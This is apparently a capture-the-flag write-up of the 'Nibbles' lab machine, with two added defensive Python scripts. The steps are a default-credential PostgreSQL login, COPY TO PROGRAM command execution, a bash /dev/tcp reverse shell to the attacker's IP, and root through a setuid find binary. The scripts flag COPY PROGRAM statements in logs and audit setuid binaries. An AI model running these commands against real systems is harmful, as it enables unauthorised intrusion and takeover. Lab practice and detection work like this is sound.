Nibbles
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 20:21 EST
Nmap scan report for 192.168.215.47
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2025-11-07 20:21:08 EST for 49s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJgyzpWrB8SyLb/XmPYQYzsnfizW7d0aNZHpwQ9ivcHQ/RYLbCc8yUIQGN2JMqCgfSj8CRMA36UnV8jnngjkw9njcgMyA5qc1mO4tzzH7VNkW2t5AmP7Q1HBt+SThlLa0Jx
BN6Gd5BOPwrsk9YTjLj8ax2ncvGBq8jzQjYmm9jF4VgBak5DY+Q5JWdf9krumSlR+V8yneV9aQ6sVy2XgkCJQLQ8GoUTm/13XUTc3TCKQ2KOJ2FzA8VcNTfxqTDxalwnYrZ1tod7BRfMeff5MwxC5gzeB+hdOVC0zAZlvNtMxH6
SCxMBRCoX9IHL27E6WtSGXCj1SLYJWrFImjp+I1L
| 256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM7uIYLogPsKP+c0QrezqQfB94ml7djfUOtG8ZAoMX6yK898l0TbgyAShcQSmdOsSMGdSO4GZpixCFJdsYkBi0M=
| 256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoHnGdMtb37ORTRBt2cTfWvQE7IB3fF3ewP/1tqn0JF
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
|_http-title: Enter a title, displayed at the top of the window.
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
5437/tcp open postgresql syn-ack ttl 61 PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Issuer: commonName=debian
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-27T15:41:47
| Not valid after: 2030-04-25T15:41:47
| MD5: b086:6d30:4913:684e:16c1:8348:fc76:fe43
| SHA-1: cb30:5109:0fc1:14ab:0fb9:8e55:5874:4bb5:ba57:66af
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIUYoM4kALX3eWKWuCQ1/K5FujVbGowDQYJKoZIhvcNAQEL
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>
This time we have a PostgreSQL service running on port 5437.
I enumerated all the other services, but nothing led to anything useful except PostgreSQL.
PostgreSQL (5437):
We can interact with PostgreSQL through the command-line tool psql.
I tried a few default credential combinations such as admin:admin; postgres:postgres worked for me:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ psql -h 192.168.215.47 -p 5437 -U postgres
Password for user postgres: postgres
psql (17.6 (Debian 17.6-1), server 11.7 (Debian 11.7-0+deb10u1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, compression: off, ALPN: none)
Type "help" for help.
postgres=#
I did not find anything interesting in the databases.
Exploitation:
From the nmap result we can guess that the service version is between 11.3 and 11.9 (the psql banner above narrows it to 11.7).
I searched for public exploits and found that we can get command execution:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ searchsploit postgresql 11.
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) | multiple/remote/50847.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ searchsploit -m 50847
Exploit: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50847
Path: /usr/share/exploitdb/exploits/multiple/remote/50847.py
Codes: CVE-2019-9193
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Nibbles/50847.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ python3 50847.py -i 192.168.215.47 -p 5437 -c whoami -U postgres -P postgres
[+] Connecting to PostgreSQL Database on 192.168.215.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _121e8b8e5b4598406bf35c942ae58806
[+] Command executed
postgres
[+] Deleting table _121e8b8e5b4598406bf35c942ae58806
Or we can do it manually ourselves, using a COPY ... TO/FROM PROGRAM query.
First, let's confirm that we have command execution:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
And send ICMP packets with the ping command:
postgres=# COPY (SELECT '') to PROGRAM 'ping 192.168.45.174 -c 3';
COPY 1
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:36:39.391134 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 1, length 64
20:36:39.391163 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 1, length 64
20:36:40.390572 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 2, length 64
20:36:40.391067 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 2, length 64
20:36:41.392266 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 3, length 64
20:36:41.392288 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 3, length 64
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernel
Indeed, we have blind RCE.
Now to get a reverse shell. I will have netcat listen on one of the ports the target already exposes (80), to avoid firewall issues with unusual ports:
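From the defender's side, the COPY ... TO/FROM PROGRAM statements used above are written to the PostgreSQL server log when log_statement is set to 'all'. The following Python script is an added example, not part of this writeup or of the 50847.py exploit: it parses a few constructed log entries in the Debian-style log_line_prefix format '%m [%p] %q%u@%d ' (assumed here; adjust the regex to your own prefix) and flags every COPY TO/FROM PROGRAM statement together with the role, database and the program that the server was asked to run.

```python
import re
from dataclasses import dataclass
from typing import List

# Matches COPY ... TO PROGRAM '<cmd>' or COPY ... FROM PROGRAM '<cmd>'.
# Case-insensitive and newline-tolerant; a doubled '' inside the literal is an escaped quote.
PROGRAM_COPY = re.compile(
    r"\bCOPY\b.*?\b(?P<direction>TO|FROM)\s+PROGRAM\s+'(?P<command>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)

# One log entry with the assumed prefix '%m [%p] %q%u@%d ' followed by the
# statement text that log_statement = 'all' produces. Background-process lines
# (no user@db because of %q) deliberately do not match.
LOG_ENTRY = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement:\s+(?P<stmt>.*)$",
    re.DOTALL,
)


@dataclass(frozen=True)
class Finding:
    ts: str
    pid: int
    user: str        # database role that issued the statement
    db: str
    direction: str   # "TO" or "FROM"
    command: str     # shell command the server process was asked to execute


def group_entries(text: str) -> List[str]:
    """Rejoin multi-line statements: PostgreSQL indents continuation lines with a tab."""
    entries: List[str] = []
    for line in text.splitlines():
        if line.startswith("\t") and entries:
            entries[-1] += "\n" + line[1:]
        elif line.strip():
            entries.append(line)
    return entries


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per COPY ... PROGRAM statement found in the log text."""
    findings: List[Finding] = []
    for entry in group_entries(text):
        m = LOG_ENTRY.match(entry)
        if not m:
            continue  # checkpointer/autovacuum lines, ERROR lines, etc.
        hit = PROGRAM_COPY.search(m["stmt"])
        if hit:
            findings.append(Finding(
                ts=m["ts"], pid=int(m["pid"]), user=m["user"], db=m["db"],
                direction=hit["direction"].upper(),
                command=hit["command"].replace("''", "'"),
            ))
    return findings


# Constructed sample entries (not real captured logs). The second mirrors the
# statement used in this writeup; the fourth is a FROM PROGRAM import split
# across two lines, which is just as privileged and must not be missed.
SAMPLE_LOG = """\
2025-11-07 20:30:01.001 EST [1201] postgres@postgres LOG:  statement: SELECT datname FROM pg_database;
2025-11-07 20:36:39.391 EST [1225] postgres@postgres LOG:  statement: COPY (SELECT '') to PROGRAM 'ping 192.168.45.174 -c 3';
2025-11-07 20:37:02.120 EST [1225] postgres@postgres LOG:  statement: COPY users TO '/tmp/users.csv';
2025-11-07 20:38:15.555 EST [1230] app@shop LOG:  statement: COPY events
\tFROM PROGRAM 'cat /var/log/app/events.csv';
2025-11-07 20:40:00.000 EST [1100] LOG:  checkpoint starting: time
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} pid={f.pid} {f.user}@{f.db} COPY {f.direction} PROGRAM -> {f.command!r}")
```

Two caveats for using this in practice: the default log_statement of 'none' records nothing, and 'mod' logs COPY FROM but not COPY TO, so 'all' (or the pgaudit extension) is required. Any role that can run these statements is either a superuser or a member of pg_execute_server_program (PostgreSQL 11 and later), so the user in each finding is also the role whose privileges should be reviewed, and the command runs as the OS account that owns the server process, which is exactly the postgres shell obtained above.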
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...
postgres=# COPY (SELECT '') to PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.174/80 0>&1"';
Going back to our netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.47] 46054
bash: cannot set terminal process group (1219): Inappropriate ioctl for device
bash: no job control in this shell
postgres@nibbles:/var/lib/postgresql/11/main$
Stabilize our shell:
postgres@nibbles:/var/lib/postgresql/11/main$ which python3
which python3
/usr/bin/python3
postgres@nibbles:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ain$ python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@nibbles:/var/lib/postgresql/11/main$ export TERM=xterm
export TERM=xterm
postgres@nibbles:/var/lib/postgresql/11/main$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
postgres@nibbles:/var/lib/postgresql/11/main$ stty rows 43 columns 171
postgres@nibbles:/var/lib/postgresql/11/main$
Post-Exploitation:
After enumerating the system a bit, we find that find is one of the SUID binaries, which we can leverage to escalate our privileges:
postgres@nibbles:/home/wilson$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/find
/usr/bin/sudo
/usr/bin/umount
postgres@nibbles:/home/wilson$ find . -exec /bin/sh -p \; -quit
# whoami
root
Get the flags:
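The escalation works only because find carries the setuid bit, which it does not have on a stock install. As an added example (not part of this writeup), the Python script below performs the defender-side check: enumerate setuid regular files the way the find command above does, then diff them against a baseline of binaries that are expected to be setuid. The baseline here is constructed from the listing above with /usr/bin/find removed, and the sample list and function names are mine; on a real host the baseline should come from a clean image of the same release.

```python
import os
import stat
from typing import Dict, FrozenSet, Iterable, List

# Baseline constructed from the SUID listing above, minus /usr/bin/find.
BASELINE_SUID: FrozenSet[str] = frozenset({
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/chsh",
    "/usr/bin/fusermount", "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/sudo", "/usr/bin/umount",
})

# Pseudo-filesystems that are slow to walk and never hold installed binaries.
SKIP_DIRS = ("/proc", "/sys", "/dev")


def collect_suid(root: str = "/") -> List[str]:
    """Return regular files under root with the setuid bit set (like find / -perm -u=s -type f)."""
    found: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def audit_suid(paths: Iterable[str], baseline: FrozenSet[str] = BASELINE_SUID) -> Dict[str, List[str]]:
    """Split observed setuid files into unexpected (not in baseline), missing (baseline but gone) and expected."""
    observed = set(paths)
    return {
        "unexpected": sorted(observed - baseline),
        "missing": sorted(baseline - observed),
        "expected": sorted(observed & baseline),
    }


# Constructed sample: the listing from the compromised host above, so the audit
# can run offline without walking a real filesystem.
SAMPLE_LISTING = [
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/gpasswd", "/usr/bin/chsh",
    "/usr/bin/fusermount", "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/find", "/usr/bin/sudo", "/usr/bin/umount",
]

if __name__ == "__main__":
    import sys
    # Pass a root directory to audit a live system; without arguments use the sample.
    paths = collect_suid(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LISTING
    report = audit_suid(paths)
    for p in report["unexpected"]:
        print(f"UNEXPECTED setuid binary: {p} (review, and consider chmod u-s)")
    for p in report["missing"]:
        print(f"baseline binary no longer setuid: {p}")
```

Run as root with / as the argument for a complete scan; unprivileged runs silently skip directories they cannot read. A binary in the "missing" list is worth a look too, since a replaced or re-permissioned system tool is another sign of tampering.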
# cd /root
# ls -la
total 28
drwx------ 4 root root 4096 Nov 7 20:18 .
drwxr-xr-x 18 root root 4096 Apr 27 2020 ..
-rw------- 1 root root 0 Jul 20 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4096 Apr 27 2020 .gnupg
drwxr-xr-x 3 root root 4096 Apr 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Nov 7 20:18 proof.txt
# cat proof.txt
b7a118cd966e295abf24ef1bc548ec98
# cat /home/wilson/local.txt
d04650dc3e507d3706f9d66381a02a90
